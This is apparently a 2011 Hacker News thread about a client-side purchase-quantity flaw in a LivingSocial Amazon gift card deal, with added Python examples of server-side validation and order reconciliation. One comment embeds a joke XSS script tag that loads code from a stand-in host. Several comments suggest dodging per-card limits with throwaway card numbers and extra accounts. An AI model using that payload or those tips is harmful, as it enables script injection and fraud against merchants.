LivingSocial Hacked (deepgreencrystals.com)
92 points by dknecht on Jan 20, 2011 | 28 comments

Fact checking is important:

Tippr.com Guy:

   "If Amazon knew there was a way to buy say 100 vouchers and receive $2000 of 
   Amazon merchandise for $1000, they would probably blow a gasket. 
   Jeff you better sit down. "
livingsocial disclaimer: (I bought one - apparently I could have bought more. :-)

   "* Amazon is not a sponsor of this promotion."
This is a customer acquisition/affiliate/advertising play on LivingSocial's part. Plus, they'll probably make some money on breakage [1] which is a component of all these coupon vendors. Certainly got my attention.

With regards to the exploit - I don't really get it - you don't get the Gift Certificate right away - I still haven't received mine, though I did get an email:

   "Thanks for getting in on this sweet deal from LivingSocial:

   $20 Amazon Gift Card*

   We'll send you an email tomorrow letting you know how you can get 
   your Amazon Gift Card* code"
Doesn't this give LivingSocial the opportunity to validate whether I'm receiving more than one coupon at a time? If all the deals go through this server-side validation, does it really matter if someone tries to play games on the client side and puts in 999 coupons (and, supposedly, pays for them)? I'm presuming LivingSocial reserves the right to change that number back to "1" (and probably take their time returning your money).

[1] http://en.wikipedia.org/wiki/Breakage

1. Amazon is the top, major investor in LivingSocial ($175 Million)

2. LivingSocial has already said they are only allowing one GC purchase per credit card (so when they tabulate tomorrow, all this hackery will fail)

3. They are being issued as Amazon vouchers, not really GC, which allows only one voucher per Amazon account. If someone managed to get 100, they would need 100 Amazon accounts.

4. Higher numbers sold look better for WOM marketing purposes, even if many of them are culled during the tabulation after the sale ends.

My guess is, LivingSocial know exactly what they are doing.

Citicard lets you generate virtual numbers. So #2 can easily be bypassed.

Ah, the article should have mentioned that you don't get the gift certificates immediately. That means LivingSocial's not completely screwed just yet.

Nonetheless, not having server-side validation built-in indicates pretty bad practice. For one, it causes them a lot of grief and work reversing all the transactions. But further, it indicates that they probably have gaping security flaws laying around waiting to be exploited.

My thoughts exactly. Server side validation is basic. There is nothing special you need to do to make it work and a lot of web frameworks now take care of 99% of that code for you anyways. This makes me think that on the software side of things, they are skipping basic steps. If I were looking, I'd consider SQL injections next. Or even XSS attacks. Yes, my name really is Igor<script src="http://evil.bit/hack.js type="text/javascript"></script>.
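To make the "server-side validation is basic" point concrete, here is an added illustration (not code from LivingSocial or from the linked post): a checkout handler that takes the quantity straight from the posted form, beside one that enforces the limit from the server's own deal record and the customer's existing orders. Only the form field name purchase_order_quantity comes from the thread; the deal, the order store and the limits are constructed for the example.

```python
"""Client-trusted vs server-enforced purchase quantity.

Constructed example: Deal, Order and the in-memory order list are invented;
the form field name ``purchase_order_quantity`` is the one mentioned in the thread.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass
class Deal:
    deal_id: str
    price_cents: int
    max_per_customer: int  # server-side limit; the client never supplies this


@dataclass
class Order:
    customer_id: str
    deal_id: str
    quantity: int
    total_cents: int


class ValidationError(ValueError):
    """Raised when a posted purchase violates a server-side rule."""


# Constructed sample deal: $10 for a $20 voucher, one per customer.
GIFT_CARD_DEAL = Deal(deal_id="amazon-gc", price_cents=1000, max_per_customer=1)


def checkout_trusting_client(form: dict, customer_id: str,
                             deal: Deal = GIFT_CARD_DEAL) -> Order:
    """'Before': the quantity is taken verbatim from the form.

    A client-side script may render a dropdown capped at 1, but whatever value
    is actually posted is accepted and priced, so 100 buys 100.
    """
    qty = int(form["purchase_order_quantity"])
    return Order(customer_id, deal.deal_id, qty, qty * deal.price_cents)


def checkout_server_validated(form: dict, customer_id: str, existing_orders: list,
                              deal: Deal = GIFT_CARD_DEAL) -> Order:
    """'After': the limit comes from the server's deal record and order history.

    The client only proposes a quantity; the server rejects anything that is not
    a positive integer or that would push this customer past the per-deal cap.
    """
    raw = form.get("purchase_order_quantity", "")
    if not isinstance(raw, str) or not raw.isdigit():
        raise ValidationError("quantity must be a positive integer")
    qty = int(raw)
    if qty < 1:
        raise ValidationError("quantity must be at least 1")
    already = sum(o.quantity for o in existing_orders
                  if o.customer_id == customer_id and o.deal_id == deal.deal_id)
    if already + qty > deal.max_per_customer:
        raise ValidationError(f"limit is {deal.max_per_customer} per customer")
    return Order(customer_id, deal.deal_id, qty, qty * deal.price_cents)


def try_checkout(form: dict, customer_id: str, existing_orders: list) -> Optional[Order]:
    """Convenience wrapper: the validated order, or None when it was rejected."""
    try:
        return checkout_server_validated(form, customer_id, existing_orders)
    except ValidationError:
        return None


if __name__ == "__main__":
    tampered = {"purchase_order_quantity": "100"}
    print("trusting client:", checkout_trusting_client(tampered, "igor"))
    print("server validated:", try_checkout(tampered, "igor", []))
```

The hardened version also has to look at what the customer has already bought: validating the single request alone would still let one account buy one voucher per request, which is the "multiple accounts" variant discussed further down the thread.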

Thanks for the Breakage concept. Wonder if it applies to how empty gyms function on unattending membership fees.

According to Business Insider, LivingSocial's CEO has said this is not a problem: http://www.businessinsider.com/livingsocial-server-flaw-2011...

"Tim O'Shaughnessy: Just saw your post come through based on Martin Tobias' post and he is off on several things, but in short, there is no widescale problem of users purchasing more than 1 gift card voucher.

Here are some specifics: First, when a user first hits "buy", we do a pre-authorization of their card but hold off on settlement until later in the day after the deal is closed. We generally do this for a variety of reasons, but a primary reason is that if a user happens to earn that day's deal for free through our Me + 3 program, we don't want to have to charge their card back. Instead we wait to see who has earned a free deal and then process the cards.

A by-product of doing the pre-auth first and the settlement later is that we can do server side validation (i.e. check for gamers) anytime through the day until the settlement occurs and we've reconciled the transaction. What does this mean? It means that today people who think they've "found a loophole" just haven't been told by us yet that they're violating the one purchase per person rule. We intentionally had that happen today because we expected people to game the system and didn't want to get into a game of cat and mouse all day. That 50-75% of the purchases were gamed is laughable.

The "code hack" Martin refers to changes things on the client side, but not our server side. Optically it will look like someone has changed their purchase number, but we have the number already locked on the server side."

The fact that they fixed the problem seems to be counter to the CEO's statement that it wasn't actually a problem.

They clearly weren't validating all of the form inputs on the server side. Hopefully this was a learning experience for the engineering team.

You have a 24 hour window for a deal like this and you know it costs you $10 for everyone who games the system. So you let the hackers think they've won then after the 24 hours is up, reveal that they've lost. Instead of finding creative and more difficult ways to game the system, the hackers wasted their 24 hours partying and getting drunk and so LivingSocial wins.

Probably not exactly how it went down, but it's a good story.

Honest question to fellow hackers and entrepreneurs: Do we have to take every opportunity to put down your competition? Are there not enough venues to market yourself?

Wouldn't a simple post like this be enough? LivingSocial does not guarantee that you get what you ordered like Tippr does.

I'd hardly call it "hacked". The post is oddly smug to claim that LivingSocial got gamed easily and their "design" is flawed and that their own solution is better.

Meh. I'll pass. Such a blog post about a competitor isn't the best way to brag about your own product.

LivingSocial has already said that they are only going to allow one GC purchase per credit card number.

So multiple purchases under one account, or multiple accounts are going to fail when they tabulate tomorrow.

Also, they are being issued as Amazon vouchers, not really GC, which allows only one voucher per Amazon account. If someone managed to get 100, they would need 100 Amazon accounts.

I know the post is by a competitor, but wouldn't telling Living Social about it first and giving them time to fix it before blogging be the "right thing" to do?

This really spooked me at first ... Just by reading the title, my first thought was that their servers got hacked maliciously and my financial data I just added today was compromised. I'm glad to see it was something more innocent :)

Talk about bad PR ... that'd be the worst they could get, if they got hacked on the day they're likely seeing their most signups ever!

Don't get too excited.

LivingSocial disabled this already (the trick doesn't work any more), and all people who tried this trick earlier today will simply get an email tomorrow saying that they are not eligible because they ordered more than 1 gift certificate.

There's simply too much money at stake for LivingSocial not to make sure that people only get 1 gift certificate each.

LivingSocial don't process the credit cards until after the deal is closed.

It wouldn't take 10 minutes to have an engineer interrogate the database to raise any orders that have a quantity greater than 1 and/or a total amount more than $10.

To claim that LivingSocial has been "hacked" is sensationalism. While I think it was a low blow, I can understand why a non-technical CEO would try this stunt but I'd have expected more sense from a technical person who should know how easy it would be to see this happening on LivingSocial's back end.
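The pre-authorize-then-settle model the CEO describes, and the "interrogate the database" sweep suggested just above, together amount to a reconciliation step run before any card is charged. Here is an added illustration of that step (not LivingSocial's code) built on an in-memory SQLite table: the schema, the card tokens and the sample orders are constructed for the example; the $10 price and the one-voucher-per-card rule come from the thread.

```python
"""Deferred settlement: pre-authorize at purchase, reconcile, then settle.

Constructed example. The table layout, tokens and sample rows are invented;
the price and the per-card limit are the ones stated in the thread.
"""
import sqlite3

DEAL_PRICE_CENTS = 1000   # $10 for the $20 voucher
PER_CARD_LIMIT = 1        # one voucher per credit card

SCHEMA = """
CREATE TABLE orders (
    order_id     INTEGER PRIMARY KEY,
    customer_id  TEXT NOT NULL,
    card_token   TEXT NOT NULL,   -- tokenised card reference, never the raw number
    quantity     INTEGER NOT NULL,
    total_cents  INTEGER NOT NULL,
    status       TEXT NOT NULL DEFAULT 'preauthorized'
);
"""

# Constructed sample: three honest buyers, one order with a tampered quantity,
# and two accounts paying with the same card.
SAMPLE_ORDERS = [
    ("alice", "tok_a", 1, 1000),
    ("bob",   "tok_b", 1, 1000),
    ("carol", "tok_c", 1, 1000),
    ("dave",  "tok_d", 100, 100000),   # client-side quantity changed to 100
    ("erin",  "tok_e", 1, 1000),
    ("erin2", "tok_e", 1, 1000),       # second account, same card
]


def load(conn: sqlite3.Connection, rows) -> None:
    """Create the table and insert pre-authorized (not yet charged) orders."""
    conn.executescript(SCHEMA)
    conn.executemany(
        "INSERT INTO orders (customer_id, card_token, quantity, total_cents) "
        "VALUES (?, ?, ?, ?)", rows)


def reconcile(conn: sqlite3.Connection):
    """Void ineligible orders, settle the rest; return (settled_ids, voided_ids).

    Rule 1 catches any single order above the per-deal quantity or price, the
    case the thread's 'quantity greater than 1 and/or more than $10' query finds.
    Rule 2 keeps only the earliest remaining order per card, so extra accounts
    on one card do not get a second voucher.
    """
    conn.execute(
        "UPDATE orders SET status = 'voided' "
        "WHERE status = 'preauthorized' AND (quantity > ? OR total_cents > ?)",
        (PER_CARD_LIMIT, DEAL_PRICE_CENTS * PER_CARD_LIMIT))
    conn.execute(
        "UPDATE orders SET status = 'voided' "
        "WHERE status = 'preauthorized' AND order_id NOT IN ("
        "    SELECT MIN(order_id) FROM orders "
        "    WHERE status = 'preauthorized' GROUP BY card_token)")
    # Everything still pre-authorized is eligible: this is where the card is charged.
    conn.execute("UPDATE orders SET status = 'settled' WHERE status = 'preauthorized'")
    settled = [r[0] for r in conn.execute(
        "SELECT order_id FROM orders WHERE status = 'settled' ORDER BY order_id")]
    voided = [r[0] for r in conn.execute(
        "SELECT order_id FROM orders WHERE status = 'voided' ORDER BY order_id")]
    return settled, voided


def run_demo(rows=SAMPLE_ORDERS):
    """Load the constructed orders into a fresh in-memory database and reconcile."""
    conn = sqlite3.connect(":memory:")
    load(conn, rows)
    return reconcile(conn)


if __name__ == "__main__":
    settled, voided = run_demo()
    print("settled:", settled)   # honest buyers plus the first order on the shared card
    print("voided:", voided)     # the tampered order and the duplicate-card order
```

Because nothing is charged until after the sweep, the order of the two rules matters only for bookkeeping; what matters for the business is that the sweep runs once, on the server, against the settled state of the table rather than against whatever the client reported.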

Doesn't appear to work now at least. Submitting any positive number as the value for purchase_order_quantity still results in the website reporting that I'll be charged for one.

LivingSocial didn't skip server-side validation - they delayed it. Now they can identify cheaters who were suckered by false reports of a loophole. Doesn't look so dumb to me.

I think this brings up an interesting point of discussion: what should sites do now and what should they do later?

In this case, a quick server-side check that did the same thing as a client-side validation seems like a no-brainer, but what about bigger, more complex actions?

What kinds of actions are you guys deferring while actually telling the customer something else (and notifying them later if something ultimately fails)?

Well, the final server side purchase shows the 1 card, $10 amount, so a fair amount of server side validation is being done.

They fixed it a few hours ago. My account is still showing I purchased 100.

If you really wanted to get multiple deals, wouldn't it make more sense to just make another LivingSocial account with a different e-mail address?

That way if/when they invalidate all of the orders from people who ordered more than 1, you won't miss out on the deal.

They'll probably check billing methods as well, so you'd have to generate a lot of extra credit card accounts. And they could ensure that the #'s for these can only be used once by one Amazon account or shipping address.

Yeah, I wouldn't be surprised if Amazon restricts your account to one of these gift certificates somehow. The deal description said "no gifting allowed."

Still, a separate e-mail address, credit card, and Amazon account would be an almost surefire way to get multiple deals. But anything past 2 or 3 would get to the point of just wasting your time.

Some credit cards allow you to generate throwaway credit card numbers, and you could sell the gift certificates to people with different addresses.

My main reaction to this story is that, after months of getting crappy offers from LivingSocial and cancelling my subscription to them, they finally offer something good.

The article says they did client-side validation to ensure that a customer could only get one of a special offer. Sheesh. Security 101.

If anybody's still reading, I'm curious why this got voted down. I thought I was adding value by pointing out the specific vulnerability, and that it was a basic security flaw. Was it too sarcastic?

